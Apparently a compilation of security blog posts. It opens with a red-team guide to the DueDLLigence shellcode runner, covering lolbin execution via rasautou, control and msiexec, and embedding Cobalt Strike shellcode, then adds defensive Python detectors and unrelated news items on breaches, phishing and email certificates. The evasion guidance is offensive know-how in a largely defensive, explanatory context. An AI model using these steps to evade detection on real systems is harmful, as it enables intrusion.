We set out to develop a shellcode runner DLL that takes advantage of lolbins through unmanaged exports while also providing the flexibility to execute both injected and non-injected shellcode without a need to update the code base. This effort resulted in a C# shellcode runner called DueDLLigence, for which the source code can be found at the GitHub page.

The DueDLLigence project provides a quick and easy way to switch between different shellcode techniques described previously in this blog post by simply switching out the value of the global variable shown in Figure 3.

Figure 3: Shellcode technique variable

The DueDLLigence DLL contains three unmanaged exports inside of it. These exports can be used with the Rasautou, Control, and Coregen native Windows commands as described in Figure 4. Note: The shellcode that is in the example will only pop calc.

Native Windows Executable | Required Export Name | Syntax Used To Run
rasautou.exe | | rasautou –d {full path to dll} –p powershell –a a –e e
control.exe | | Rename compiled “dll” extension to “cpl” and just double click it!
msiexec.exe | | msiexec /z {full path to dll}

Figure 4: DueDLLigence execution outline

When you open the source code you will find the example uses the exports shown in Figure 5.

Figure 5: Source code for exported entry points

The first thing you should do is generate your own shellcode. An example of this is shown in Figure 6, where we use Cobalt Strike to generate raw shellcode for the “rev_dns” listener. Once that is complete, we run the base64 -w0 payload.bin > [outputFileName] command in Linux to generate the base64 encoded version of the shellcode as shown in Figure 7.

Figure 6: Shellcode generation

Figure 7: Converting shellcode to base64

Then you simply replace the base64 encoded shellcode on line 58 with the base64'd version of your own x86 or x64 shellcode. The screenshot in Figure 6 generated an x86 payload; to generate an x64 payload you will need to check the “use x64 payload” box.

At this point you should reinstall the Unmanaged Exports library in the DueDLLigence Visual Studio project, because it sometimes does not work properly when carried over from a different project. You can reinstall it by opening the NuGet package manager console shown in Figure 8 and running the Install-Package UnmanagedExports -Version 1.2.7 command.

Figure 8: Open NuGet Package Manager

After you have reinstalled the Unmanaged Exports library and replaced the base64 encoded shellcode on line 58, you are ready to compile! Go ahead and build the source and look for your DLL in the bin folder. We strongly suggest that you test your DLL to ensure it has the proper exports associated with it. Visual Studio Pro comes with the Dumpbin.exe utility, which you can run against your DLL to view the exports as shown in Figure 9.

Figure 9: Dumpbin.exe output

You can expand the list as much as you want with more lolbin techniques found over at the GitHub page.

We prefer to remove the unmanaged exports that are not going to be used with the respective payload that was generated so there is a smaller footprint in the payload. In general, this is good tradecraft when crafting payloads or writing code. In our industry we have the principle of least privilege, well this is the principle of least code!

Modern Detections for Shellcode Injection

Despite all the evasive advantages that shellcode offers, there is hope when it comes to detecting shellcode injection. We looked at several different methods for process injection.

In our shellcode runner, the shellcode injection techniques (CreateRemoteThread and QueueUserAPC) spawn a process in a suspended state and then inject shellcode into the running process. Let’s say we choose the process to inject into as explorer.exe and our payload will run with MSIExec. This will create a process tree where cmd.exe will spawn msiexec.exe which will in turn spawn explorer.exe.

Figure 10: Process tree analysis

In an enterprise environment it is possible to collect telemetry data with a SIEM to determine how often, across all endpoints, the cmd.exe -> msiexec.exe -> explorer.exe process tree occurs. Using parent-child process relationships, defenders can identify potential malware through anomaly detection.
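As an added example of the parent-child baselining described above (it is not code from the FireEye post or from DueDLLigence), the following Python script builds three-deep ancestry chains from process-creation telemetry, counts on how many endpoints each chain occurs, and flags the chains seen on only a handful of hosts. The event layout (host, pid, parent pid, image name) is an assumption modelled on what a SIEM would keep from Sysmon Event ID 1 or an EDR process-create record; all events, host names and pids are constructed for the sample, and the simplified parentage (explorer.exe directly under wininit.exe) is a sample convenience rather than how Windows actually boots.

```python
"""Process-tree anomaly detection over constructed process-creation telemetry.

Events are modelled on the fields a SIEM collects from Sysmon Event ID 1 or an
EDR process-create record: host, pid, parent pid, image name.  All sample
events below are constructed for this example; the pids are arbitrary.
"""
from collections import Counter, defaultdict


def _baseline(host):
    """Constructed 'normal' activity for one host (parentage simplified)."""
    return [
        (host, 4, 0, "System"),
        (host, 400, 4, "wininit.exe"),
        (host, 500, 400, "services.exe"),
        (host, 600, 500, "svchost.exe"),
        (host, 700, 500, "svchost.exe"),
        (host, 1000, 400, "explorer.exe"),
        (host, 1100, 1000, "cmd.exe"),
    ]


SAMPLE_EVENTS = (
    _baseline("ws01") + [("ws01", 1200, 1100, "ping.exe")]
    + _baseline("ws02") + [("ws02", 1200, 1100, "ping.exe")]
    # ws03 carries the tree from the blog post: cmd.exe -> msiexec.exe -> explorer.exe
    + _baseline("ws03")
    + [("ws03", 1300, 1100, "msiexec.exe"), ("ws03", 1400, 1300, "explorer.exe")]
)


def ancestry_chains(events, depth=3):
    """Map each ancestry chain (oldest ancestor first, `depth` images long) to
    the number of distinct hosts on which it was observed.  Processes whose
    known ancestry is shorter than `depth` (the root, for instance) add no chain."""
    by_host = defaultdict(dict)
    for host, pid, ppid, image in events:
        by_host[host][pid] = (ppid, image)

    hosts_per_chain = defaultdict(set)
    for host, procs in by_host.items():
        for pid, (ppid, image) in procs.items():
            chain = [image]
            cur = ppid
            # Walk up the parent links until the chain is long enough or the
            # parent is unknown on this host.
            while len(chain) < depth and cur in procs:
                cur_ppid, cur_image = procs[cur]
                chain.append(cur_image)
                cur = cur_ppid
            if len(chain) == depth:
                hosts_per_chain[tuple(reversed(chain))].add(host)
    return Counter({chain: len(hosts) for chain, hosts in hosts_per_chain.items()})


def rare_chains(chain_counts, max_hosts=1):
    """Chains seen on at most `max_hosts` hosts: candidates for analyst review."""
    return sorted(chain for chain, n in chain_counts.items() if n <= max_hosts)


def hunt(events, max_hosts=1):
    """Baseline the fleet, then return the rare chains (oldest ancestor first)."""
    return rare_chains(ancestry_chains(events), max_hosts)


if __name__ == "__main__":
    for chain in hunt(SAMPLE_EVENTS):
        print(" -> ".join(chain))
```

On the sample fleet the only chains confined to a single host are the two produced by the injection scenario (explorer.exe -> cmd.exe -> msiexec.exe and cmd.exe -> msiexec.exe -> explorer.exe); the threshold should be set against the real fleet size rather than the absolute value used here.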

API hooking is commonly used by EDR and AV products to monitor and detect the use of Windows API calls that are commonly used by malware authors. Utilizing kernel routines such as PsSetCreateProcessNotifyRoutine(Ex) and PsSetCreateThreadNotifyRoutine(Ex), security software can monitor when certain API calls are used, such as CreateRemoteThread. Combining this information with other data, such as process reputation and enterprise-wide telemetry, can provide high-fidelity alerts for potential malware.

When process injection occurs, one process modifies the memory protections of a memory region in another process’s address space. Detecting the use of API calls such as VirtualProtectEx that result in one process modifying the memory protections of address space allocated to another process can therefore identify injection, especially when the PAGE_EXECUTE_READWRITE permission is used, since that permission allows the shellcode to be written and executed within the same memory region.

As red teamers and malicious actors continue to develop new process injection techniques, network defenders and security software continue to adapt to the ever-changing landscape. Monitoring Windows API function calls such as VirtualAllocEx, VirtualProtectEx, CreateRemoteThread, and NtQueueApcThread can provide valuable data for identifying potential malware. Monitoring for the use of CreateProcess with the CREATE_SUSPENDED and CREATE_HIDDEN flags may assist in detecting process injection where the attacker creates a suspended and hidden process to inject into.

As we’ve seen, process injection techniques tend to follow a consistent order in which they call Windows API functions. For example, both injection techniques call VirtualAllocEx followed by WriteProcessMemory, and identifying when a process calls these two APIs in that order against another process can serve as a basis for detecting process injection.
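The detection ideas in the last few paragraphs, as an added example that is not part of the FireEye post: a small Python detector set run over constructed API-call telemetry. The key=value line format is an assumption made for the example (real hook or kernel-callback telemetry is shaped differently but carries the same fields: calling pid, API name, target pid, requested protection, creation flags); the pids and image names are constructed. It implements the ordered VirtualAllocEx-then-WriteProcessMemory rule, the PAGE_EXECUTE_READWRITE-in-a-foreign-process rule, the CREATE_SUSPENDED rule and the remote-thread/APC rule, each as a separate function so they can be tuned independently.

```python
"""API-call sequence detection over constructed hook/callback telemetry.

Each line is one observed call in a key=value format assumed for this example.
All lines below are constructed; pids are arbitrary.  Lines 1001-1006 model
the QueueUserAPC-style injection from the post (msiexec.exe into a suspended
explorer.exe); the remaining lines are benign noise.
"""
import re

SAMPLE_LOG = """\
ts=1001 pid=3302 image=cmd.exe api=CreateProcess child=msiexec.exe flags=0
ts=1002 pid=4410 image=msiexec.exe api=CreateProcess child=explorer.exe flags=CREATE_SUSPENDED
ts=1003 pid=4410 image=msiexec.exe api=VirtualAllocEx target=5120 protect=PAGE_READWRITE
ts=1004 pid=4410 image=msiexec.exe api=WriteProcessMemory target=5120
ts=1005 pid=4410 image=msiexec.exe api=VirtualProtectEx target=5120 protect=PAGE_EXECUTE_READWRITE
ts=1006 pid=4410 image=msiexec.exe api=NtQueueApcThread target=5120
ts=1007 pid=2200 image=chrome.exe api=VirtualAllocEx target=2200 protect=PAGE_READWRITE
ts=1008 pid=2200 image=chrome.exe api=WriteProcessMemory target=2200
ts=1009 pid=2201 image=WerFault.exe api=VirtualAllocEx target=2200 protect=PAGE_READWRITE
"""

FIELD = re.compile(r"(\w+)=(\S+)")
INT_FIELDS = ("ts", "pid", "target")


def parse_log(text):
    """Turn the key=value lines into dicts, ordered by timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = dict(FIELD.findall(line))
        for key in INT_FIELDS:
            if key in rec:
                rec[key] = int(rec[key])
        events.append(rec)
    return sorted(events, key=lambda e: e["ts"])


def is_cross_process(ev):
    """True when the call targets a process other than the caller."""
    return "target" in ev and ev["target"] != ev["pid"]


def detect_alloc_then_write(events):
    """VirtualAllocEx followed, in order, by WriteProcessMemory against the same
    foreign process: the two-call sequence shared by both injection techniques."""
    pending, alerts = set(), []
    for ev in events:
        if not is_cross_process(ev):
            continue
        key = (ev["pid"], ev["target"])
        if ev["api"] == "VirtualAllocEx":
            pending.add(key)
        elif ev["api"] == "WriteProcessMemory" and key in pending:
            alerts.append(("alloc-then-write", ev["pid"], ev["target"]))
            pending.discard(key)
    return alerts


def detect_rwx_in_foreign_process(events):
    """A caller making another process's memory both writable and executable."""
    return [("rwx-foreign-memory", ev["pid"], ev["target"]) for ev in events
            if is_cross_process(ev)
            and ev["api"] in ("VirtualAllocEx", "VirtualProtectEx")
            and ev.get("protect") == "PAGE_EXECUTE_READWRITE"]


def detect_suspended_create(events):
    """CreateProcess with CREATE_SUSPENDED: a child started but not yet running."""
    return [("suspended-child", ev["pid"], ev["child"]) for ev in events
            if ev["api"] == "CreateProcess"
            and "CREATE_SUSPENDED" in ev.get("flags", "").split("|")]


def detect_remote_execution(events):
    """The calls that actually hand a thread to memory in another process."""
    return [("remote-thread", ev["pid"], ev["target"]) for ev in events
            if is_cross_process(ev)
            and ev["api"] in ("CreateRemoteThread", "NtQueueApcThread")]


DETECTORS = (detect_alloc_then_write, detect_rwx_in_foreign_process,
             detect_suspended_create, detect_remote_execution)


def run_detectors(text):
    """Parse the telemetry once and collect the alerts from every detector."""
    events = parse_log(text)
    alerts = []
    for detector in DETECTORS:
        alerts.extend(detector(events))
    return alerts


if __name__ == "__main__":
    for alert in run_detectors(SAMPLE_LOG):
        print(alert)
```

The self-targeted chrome.exe allocation and the WerFault.exe allocation that is never followed by a write are deliberately left in the sample: a process reserving memory in itself, or a crash handler reading another process, is ordinary, and the ordered pair rule is what keeps those out of the alert list.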


Using shellcode as the final stage for payloads during assessments allows Red Teams the flexibility to execute payloads in a wide array of environments while implementing techniques to avoid detection. The DueDLLigence shellcode runner is a dynamic tool that takes advantage of the evasive properties of both shellcode and process injection to offer Red Teams a way to avoid detection. Detections for the execution of LOLbins on the command line and process injection at the API and process level should be incorporated into defensive methodology, as attackers are increasingly being forced into living off the land with the increased adoption of application whitelisting.

New ISF Paper Attempts to Demystify AI in Information Security

In a paper released today, the Information Security Forum is urging organizations to capitalize on the opportunities offered by artificial intelligence while taking sensible steps to reduce the risks posed by this still immature technology.  

Demystifying Artificial Intelligence in Information Security defines exactly what AI is, then lays out a realistic analysis of what it can do, and will be able to do soon, for both legitimate organizations and criminals.

While detailing AI's potential to significantly improve cyber-defenses, especially around early threat detection, ISF's research recognizes that the technology carries with it the disease as well as the cure. 

Researchers wrote: "No matter the function for which an organization uses AI, such systems and the information that supports them have inherent vulnerabilities and are at risk from both accidental and adversarial threats. Compromised AI systems make poor decisions and produce unexpected outcomes.

"Simultaneously, organizations are beginning to face sophisticated AI-enabled attacks—which have the potential to compromise information and cause severe business impact at a greater speed and scale than ever before."

According to researchers, companies that have already adopted AI while it's still in its baby feathers have enjoyed benefits that include being able to counter existing threats more easily. But, as threat actors nurture their own twisted versions of the new technology to maturity, this early advantage will shrink into nothingness. 

"An arms race is developing," said ISF's managing director, Steve Durbin. "AI tools and techniques that can be used in defense are also available to malicious actors including criminals, hacktivists, and state-sponsored groups. 

"Sooner rather than later these adversaries will find ways to use AI to create completely new threats such as intelligent malware—and at that point, defensive AI will not just be a 'nice to have.' It will be a necessity."

Asked how far away the world is from intelligent malware, ISF senior research analyst Richard Absalom told Infosecurity Magazine: "Back in January 2018, in our publication Threat Horizon 2020, we predicted that intelligent malware would emerge by 2020. I don’t think that prediction is far off but can’t be sure—I wouldn’t bet my house on it! 

"What we do know is that attackers can already use AI tools to identify vulnerabilities—although human hackers are still better at exploiting them. As soon as that intelligent malware emerges, AI tools will be required to spot anomalous activity on the network and identify well-hidden malware. 

"For example, social engineering attacks that use deepfake videos and automated vishing are likely to make it impossible for human eyes and ears to identify what is real and what is fake—it may be that intelligent systems will be required to analyze all types of digital communications to establish source and authenticity."

Asked if the benefits of AI will always outweigh the risks, Absalom said: "Yes—if (big IF) the risks are managed properly. AI promises some really exciting developments for information security. The risks are not insurmountable but do require serious thought and investment to manage."

Online Gaming Risks and Kids: What to Know and How to Protect Them

Online games aren’t new. Consumers have been playing them since as early as 1960. However, the market is evolving—games that used to require the computing power of dedicated desktops can now be powered by smartphones, and online gaming participation has skyrocketed. This unfortunately means that the dangers of online gaming have evolved as well. We’ve examined the top threats that parents need to know about to keep their kids safe while gaming online.

Online Bullying and Harassment

A recent study shows that 65% of players who participate in online gaming have been harassed, a statistic that does not bode well for underage gamers. Your first instinct may be to try to prevent your child from participating in online gaming altogether, but this may cause them to sneak playing time without your knowledge. A stronger choice would be to talk with your kids and prepare them for the types of negative behavior they may experience online, and to make sure they know they can come to you if they are being harassed. It’s also important to explain the impact that online bullying can have on others, and to set firm consequences if you catch your child participating in harassment or abusive language. Regulating the use of headsets can help prevent both your child’s exposure to and participation in online harassment.

Two types of harassment specific to online experiences go a step beyond what you would expect from online bullying: doxxing and swatting. Doxxing is when one or more online participants seek personal, identifying information on a particular user for blackmail or intimidation purposes. Doxxing can often lead to the release of real names, phone numbers, home addresses, employer information, and more. Swatting is a form of harassment that uses doxxing techniques to create an actual, tangible threat. A harasser will call in a threat to a doxxed user’s local law enforcement, often claiming there is a kidnapping or hostage situation at the victim’s address. This may bring a large SWAT response unit to descend upon the address.

Keeping an open line of communication about your kid’s gaming experiences is critical. Swatting can happen over seemingly innocuous events. One of the most notorious examples followed a dispute over a $1.50 bet in “Call of Duty: WWII.”

Pro tip: one is only vulnerable to doxxing and swatting if a harasser can link identifying information back to the targeted gamer. Educating your kids on digital privacy best practices is one of the strongest security measures you can take against these forms of online harassment.

Viruses and Malware

As with almost every digital experience, you’ll find specific cybersecurity threats associated with the online gaming landscape. We asked Tyler Moffitt, Webroot security analyst, for his thoughts on the malware threats associated with online gaming. 

“The thing kids should really watch out for with games is the temptation to cheat,” explains Moffitt. “In popular games like Fortnite and PUBG, ‘aimbots’ are very common, as they allow the player to get headshots they normally wouldn’t be able to make. However, many of the aimbots that kids download from forums are packed with malware—usually ransomware or info-stealing Trojans. What’s worse: a lot of young gamers also don’t run antivirus because they think it will make the game slower.”

The bottom line: cheating at online games isn’t just ethically icky, it makes you a proven target for hackers. Make sure your kids know the real cost of “free” cheats.

Phishing Scams and Account Takeovers

Where there’s money, there are scammers. With more than 1 billion gamers actively spending money not just on games, but in games, it’s no surprise that phishing scams have become commonplace in gaming communities. One of the most prevalent phishing tactics in gaming is the account takeover, often prompted by a risky link click on a gaming forum or by a compromised account sending phishing links to other users. Once the hacker has control of the account, they can run up fraudulent charges to any attached credit cards or, in some cases, sell the compromised account (particularly if it contains valuable items or character skins). Young gamers are especially at risk for these hacks. In these cases, chances are that any credit cards attached to gaming accounts belong to you, not your kids, so young gamers aren’t going to notice who’s spending your hard-earned funds.

Keeping Your Kids Safe

You’ll find plenty of tools to help your kids stay secure while gaming. Reliable antivirus software installed and up-to-date on all of your household smart devices can protect your family from malicious software. Additionally, wrapping your household web traffic in the secure encryption of a trusted VPN could reduce doxxing potential. But your kids will only find true security through digital literacy. Start conversations with them not just about online bullying, but about recognizing cybersecurity threats and phishing scams. If you’re having a hard time connecting with them over the threat, remind them that it’s not just your wallet on the line. Account takeovers are now all too common, and no kid wants to see their Fortnite skins sold for a stranger’s profit. Also, always be sure to exercise caution in giving out information on the internet. Even small, seemingly irrelevant pieces of information could be used to pull up Facebook or other user account pages to grab even more personal data.

To keep your kids educated about online gaming risks, it’s important to educate yourself as well. Have a question we didn’t cover here? Ask the Webroot community.

The post Online Gaming Risks and Kids: What to Know and How to Protect Them appeared first on Webroot Blog.

Apple iTunes and iCloud for Windows 0-Day Exploited in Ransomware Attacks

Watch out Windows users! The cybercriminal group behind BitPaymer and iEncrypt ransomware attacks has been found exploiting a zero-day vulnerability affecting a little-known component that comes bundled with Apple's iTunes and iCloud software for Windows to evade antivirus detection. The vulnerable component in question is the Bonjour updater, a zero-configuration implementation of network

Data of 250K Users of Sex Industry Website on Sale for $300

A hacker has exploited a vulnerability on Dutch website Hookers.nl to appropriate the account details of all 250,000 users, which he is now offering for sale on the dark web.

The exposed data includes the email addresses, usernames, IP addresses, and passwords of sex workers and their clients. In a sample of the data viewed by Dutch news broadcaster NOS, the passwords were encrypted, but the email addresses—many of which included the actual names of the users—were fully legible.    

The hacker, an unknown man, expressed no guilt or regret over his actions, telling NOS: "Tens of thousands of websites are hacked every day. I'm not the devil. It's not a question of whether your website is hacked, but when."

According to NOS, while the hacker hasn't completed any sales of the data yet, it is available for purchase by any interested parties for a mere $300.

A moderator for Hookers.nl wrote: "Offering this information for sale is punishable by law, and if possible, we will take legal action. In addition, a report has been made to the Dutch data protection authority."

Hookers.nl is a popular website among sex workers and their clients, who use it to write reviews, exchange tips, and share their experiences of the sex industry. The website confirmed to NOS this morning that the breach had occurred and issued the assurance that all users would be notified.

The breach occurred as a result of a technical weakness in the vBulletin forum software, which was revealed a few weeks ago. The opportunistic hacker told NOS that he exploited the hole before the company behind the website, Midhold, plugged it with a patch on September 25. 

"It is of course not an account of your internet provider that leaked, maybe you don't want people to know that you have an account here. We are not happy with this," said Tom Lobermann, spokesperson for Midhold, which also operates Kinky.nl, Erotracks.nl, and Webcambordeel.nl.

A breach of this kind carries with it the threat of blackmail. Arda Gerkens of the Help Wanted foundation, who assists victims of sex-related abuse, said: "Membership in such a forum is certainly something someone can be extorted with. Some people are not secretive about their prostitution visit, but it is certain that when people use a nickname, they want to remain anonymous."

Hookers.nl has set up a forum page for users who want their accounts to be removed.

Watch Your Step: Insights on the TOMS Shoes Mailing Hack

You’re familiar with the cybercriminals that go after users’ credit card information and look to spread malicious links, but recently, one hacker decided to send a different message. According to Vice’s Motherboard, a hacker accessed TOMS Shoes’ mailing list and sent an email encouraging users to log off and go enjoy the outdoors.

The email specifically stated, “hey you, don’t look at a digital screen all day, theres a world out there that you’re missing out on.” The hacker claimed to have compromised TOMS a while back but never had any malicious intent and felt it had been too long to disclose the breach to the authorities. Although the hacker didn’t tell Motherboard how he or she specifically gained access to the TOMS account, they did voice their frustrations with hackers who steal data from large companies and innocent civilians.

Representatives from TOMS stated that they are actively looking into the breach and warned users to not interact with the message. And while this particular hacker had no malicious intent, users could have a potential phishing scam on their hands if these email addresses had ended up in the wrong hands.

So, whether you’re a TOMS shoe wearer or not, it’s important to stay updated on potential cyberthreats so you can recognize them immediately. Here are some tips to help you avoid accidentally treading on potential phishing emails:

  • Go directly to the source. Be skeptical of emails claiming to be from companies with peculiar asks or messages. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Be cautious of emails asking you to take action. If you receive an email asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links.
  • Hover over links to see and verify the URL. If someone sends you an email with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Watch Your Step: Insights on the TOMS Shoes Mailing Hack appeared first on McAfee Blogs.

Verified Mark Certificate Issued to CNN

CNN has been issued a new digital certificate that uses logo verification to prove emails sent from a particular domain are genuine.

The certification of the American news channel with a Verified Mark Certificate by DigiCert, Inc. marks the first time a VMC has been issued for a domain that sends emails at scale. 

The news follows the announcement on September 4, 2019, that Entrust Datacard had become the first certification authority (CA) to issue a VMC. 

VMCs work by verifying the existence of a secure connection between a company domain and a particular sender-designated brand logo included within an email. 

The certificates are signed cryptographically with a trusted root, allowing mail applications to rely on the information the certificate contains. The organization is issued a VMC by a CA once the signature process has been completed.

Receiving their certificate has readied CNN for participation in upcoming pilots of the BIMI (Brand Indicators for Message Identification) standard, which is being developed by AuthIndicators Working Group. BIMI will allow domain owners to specify a logo that will appear in the inbox, alongside authenticated email messages sent from their domains. 

To work, BIMI requires both the email and the logo to be properly validated. The email must be authenticated through the Domain-based Message Authentication, Receiving & Conformance (DMARC) standard, with a policy of quarantine or reject; the logo itself will be validated by the VMC.

While Yahoo Mail is currently running a pilot of BIMI, Google is planning a BIMI pilot of its own in 2020.

VMCs are not currently in use in BIMI pilots, but they are expected to become a requirement because they are a scalable way to ensure that corporate logos are not used fraudulently. 

With widespread use of VMC, BIMI, and DMARC, companies will be able to amplify and protect their online presence through authenticated messages to consumers that are instantly recognizable by their known, protected brand marks.
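The prerequisites just described (a DMARC policy of quarantine or reject, plus a logo whose authority evidence is a VMC) can be checked against a domain's published records before a BIMI pilot. The Python below is an added example, not DigiCert's, CNN's or the AuthIndicators Working Group's code. It assumes the record shapes a domain owner publishes: `_dmarc.<domain>` as `v=DMARC1; p=...` and `default._bimi.<domain>` as `v=BIMI1; l=<logo URL>; a=<authority evidence URL>`, with the `a=` tag pointing at the VMC. No DNS is queried; the record values are constructed samples, and treating a partial `pct=` rollout as disqualifying is a choice made here rather than something the article states.

```python
"""BIMI readiness check for a domain's published DMARC and BIMI records.

Record shapes assumed for this example:
  _dmarc.<domain>         TXT "v=DMARC1; p=reject; ..."
  default._bimi.<domain>  TXT "v=BIMI1; l=<logo url>; a=<authority evidence url>"
No DNS lookups are performed; the values below are constructed samples.
"""

STRONG_POLICIES = {"quarantine", "reject"}

# Constructed sample records for example.com (not real DNS data).
GOOD_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"
WEAK_DMARC = "v=DMARC1; p=none; rua=mailto:dmarc@example.com"
PARTIAL_DMARC = "v=DMARC1; p=quarantine; pct=10"
GOOD_BIMI = "v=BIMI1; l=https://example.com/brand/logo.svg; a=https://example.com/brand/vmc.pem"
BIMI_NO_VMC = "v=BIMI1; l=https://example.com/brand/logo.svg;"


def parse_tags(record):
    """Parse the 'tag=value; tag=value' syntax shared by DMARC and BIMI records."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def bimi_readiness(dmarc_txt, bimi_txt):
    """Return (ready, reasons); each reason names one failed prerequisite."""
    reasons = []

    d = parse_tags(dmarc_txt)
    if d.get("v") != "DMARC1":
        reasons.append("DMARC record missing or malformed")
    policy = d.get("p", "none")  # p= is required by DMARC; treat absence as none
    if policy not in STRONG_POLICIES:
        reasons.append(f"DMARC p={policy}: BIMI requires quarantine or reject")
    # sp= defaults to p=; an explicit weaker subdomain policy also disqualifies.
    if "sp" in d and d["sp"] not in STRONG_POLICIES:
        reasons.append(f"DMARC sp={d['sp']}: subdomain policy weaker than quarantine")
    # pct= defaults to 100.  Assumption for this check: a partial rollout means
    # not all mail is enforced, so it is treated as disqualifying.
    if d.get("pct", "100") != "100":
        reasons.append(f"DMARC pct={d['pct']}: enforcement must cover 100% of mail")

    b = parse_tags(bimi_txt)
    if b.get("v") != "BIMI1":
        reasons.append("BIMI record missing or malformed")
    if not b.get("l", "").startswith("https://"):
        reasons.append("BIMI l= must be an https URL to the logo")
    if not b.get("a", "").startswith("https://"):
        reasons.append("BIMI a= (authority evidence / VMC) missing: logo cannot be validated")

    return (not reasons, reasons)


if __name__ == "__main__":
    for name, dmarc, bimi in (("good", GOOD_DMARC, GOOD_BIMI),
                              ("weak-dmarc", WEAK_DMARC, GOOD_BIMI),
                              ("no-vmc", GOOD_DMARC, BIMI_NO_VMC)):
        ready, why = bimi_readiness(dmarc, bimi)
        print(name, "ready" if ready else "not ready", why)
```

The check is deliberately split into a DMARC half and a BIMI half: a mailbox provider evaluates the DMARC policy first, so a weak policy makes the logo irrelevant no matter how good the VMC is.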

"DigiCert is excited to work with CNN and members of the AuthIndicators Working Group to take this first step in demonstrating the feasibility and benefit of VMCs for global brands under the BIMI pilot program," said DigiCert chief of product Jeremy Rowley.

Securing the Unsecured: State of Cybersecurity 2019 – Part II

Recently the Straight Talk Insights team at HCL Technologies invited a social panel to discuss a critical question at the center of today’s digital transitions: How do companies target investments and change the culture to avoid being the next victim of a cyberattack?

In Part I of the series, we explored IT security trends for 2019 and ways companies can protect themselves from IoT device vulnerability. Today, we’re continuing the discussion by exploring the threat of cryptocrime, the nature of cybersecurity threats in the near future, and the steps that small- and medium-sized businesses can take to protect themselves.

Q3: How great is the threat to companies of “crypto crime”?

The thing about ransomware is that it’s no longer the province of specific groups. At the RSA Conference this year, McAfee’s own Raj Samani shared the advent of the franchise model in crypto crime. As a result, we are seeing greater reach, but fewer unique systems applying ransomware. Still, we see enterprises failing in the same ways year after year and falling victim to these families of ransomware at scale.

As you seek to conquer incident response as an effective plank of mitigating the effect of phishing and initial ransomware infections—I’d ask, how does your incident response change in the cloud? Do you have incident response resources and provisions for SaaS vs. IaaS? How do you get the logs and resources that you need from cloud providers to effectively investigate and ensure you have identified all affected nodes, or the initial attack vector? The time to figure out that question isn’t during time-compressed investigation stages when everyone is under stress from an active threat.

With the recent third anniversary of No More Ransom, security leaders like Raj Samani and the companies that make up partnerships like that of the No More Ransom website can help offer basic protection for some forms of ransomware. In this joint project with Europol and AWS, it’s been an amazing journey to watch and even invest in helping protect businesses against ransomware.

Q4: How can small businesses with limited resources protect the privacy of their customers?

The dwell time of threats in small and medium businesses is 45 to 800 days, with the averages moving more towards the latter. Cloud based information security SaaS (Software as a Service) is helping to level the playing field. To make continued progress, venture capital backing small firms, and the public buying from these companies, need to assert an expectation of security as part of doing business.

Many restaurants and retail establishments are still small businesses today, run by families and individuals. In many of these stores, there is a certain level of distrust of cloud and connected platforms, versus point-of-sale systems they can put their hands on and feel like they have control over. How do we gain the trust and attention of these small stakeholders, and help them either more strongly secure things in-house or make the move to cloud security services? We can’t just have an answer that demands $4,000 or $40,000 to make the fix. Instead we have to find every possible opportunity to go serverless and make more and more walled-garden capability for things like point of sale, or small engineering platforms.

When it comes to small businesses interconnecting systems and moving into cloud services for consumers, having these small companies hold identities is a challenge from a trust perspective. Forums and programs like the OpenID technologies, which provide standards and enable identity without spreading the authorization infrastructure unnecessarily, have been instrumental in constraining the size of this problem.

Security spans everything. There are basic exercises that you can do as business customers to check your readiness. I am a huge fan of SOAPA from ESG as a method of mapping what assets you have at different levels of the organization. Ask yourself a basic question: can you keep control integrity when you go from one “tower” —like on-premise—of connected capability to mapping the other silos or major cloud environments of your hybrid company? I’d also add it costs nothing to follow some of your favorite security personalities. I follow people like Cisco’s Wendy Nather and Kate Moussouris, the CEO of Luta Security, who is helping even small companies understand the market of bug bounties and vulnerability disclosure.

Here, too, public policy potentially has a natural role. Government requires health training, for example in a restaurant, but not information security necessarily at small- and medium-sized business. Actually, the natural consequences and motivations of insurance companies can be an ally here, requiring training in basic computer hygiene, security, and privacy as part of issuing liability policies for businesses.

Q5: What are some new cybersecurity threats that we can expect to see in the next year?

I expect to see the rise of more significant exploitation of the “seams” in cloud integrations. The recent Capital One breach was relatively benign in the scheme of things. The actor was a braggart hacktivist, but the media coverage emphasized the weakness of cloud integrations to many who might have more capability. We’ve seen spikes in discussion in the dark web around this, so the profile of the cloud vulnerability is higher, and now we will have to see how the cat-and-mouse game between offense and defense proceeds.

I think it’s worth adding, the next threat isn’t as much the challenge to me as the enterprise reaching the next rung of maturity in the digital environment. Asset management, vulnerability reduction, and preparing the protection of cloud operations and visibility are all critical disciplines for the enterprise, no matter what the threat is.

Protect your devices. Protect your cloud—not in silos, but with an integrated strategy. Demand from your vendors the ability to integrate to maintain a cohesive threat picture which you can use to easily react.

To read Part I of this two-part series, click here.


The post Securing the Unsecured: State of Cybersecurity 2019 – Part II appeared first on McAfee Blogs.

Critical Security Vulnerability Disclosed in iTerm2 App

A critical vulnerability has been discovered in the popular iTerm2 application, an open source terminal emulator program designed to replace the default Apple Terminal in macOS. iTerm2 often finds its way into lists of some of the best software to install on a Mac. It is especially popular with power users as a result of […]… Read More

The post Critical Security Vulnerability Disclosed in iTerm2 App appeared first on The State of Security.

SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries

People in Nordic countries and beyond should beware: there’s a new credential stealing campaign up and running. For now, it seems to be hitting mostly these countries, but there’s no telling when it will extend to the rest of the world. Where there’s (illicit) money to be made, hackers are restless.

How the New Nordics Credential Stealing Campaign Works

As far as we’ve seen so far, the new Nordics credential-stealing campaign is targeting work email accounts. The malicious message pretends to be part of a previously agreed-upon conversation: the document is introduced as a bare link, without much explanation.

This is what a typical email looks like:

Fra: [sender email address] Sendt: 2. oktober 2019 09:56
Emne: Doc
Prioritet: Høj


Finn vedlagte dokument

